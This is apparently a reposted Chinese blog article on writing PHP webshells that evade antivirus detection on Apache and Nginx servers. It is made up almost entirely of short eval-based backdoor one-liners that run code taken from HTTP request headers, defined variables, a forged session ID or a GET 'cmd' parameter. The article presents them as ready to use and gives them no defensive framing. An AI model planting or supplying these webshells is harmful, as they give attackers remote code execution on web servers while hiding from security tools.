PHP利用Apache、Nginx的特性实现免杀Webshell
2021-05-04 02:28
阅读:715
标签:tran https 变量 数组 tin orm webshell auto tps 另外一种通过执行伪造的sessionid值,进行任意代码执行。 PHP利用Apache、Nginx的特性实现免杀Webshell 标签:tran https 变量 数组 tin orm webshell auto tps 原文地址:https://www.cnblogs.com/hookjoy/p/12117466.html
环境
函数
用法
nginx
get_defined_vars()返回由所有已定义变量所组成的数组
apache
getallheaders()获取全部 HTTP 请求头信息
apache环境
1
2
3
eval(next(getallheaders()));
?>
apache和nginx环境通用
1
2
3
eval(implode(reset(get_defined_vars())));
?>
1
2
3
eval(hex2bin(session_id(session_start())));
?>
给webshell加密码
1
eval(get_defined_vars()[‘_GET‘][‘cmd‘]);?>
上一篇:js防抖
文章来自:搜素材网的编程语言模块,转载请注明文章出处。
文章标题:PHP利用Apache、Nginx的特性实现免杀Webshell
文章链接:http://soscw.com/index.php/essay/82069.html
文章标题:PHP利用Apache、Nginx的特性实现免杀Webshell
文章链接:http://soscw.com/index.php/essay/82069.html
评论
亲,登录后才可以留言!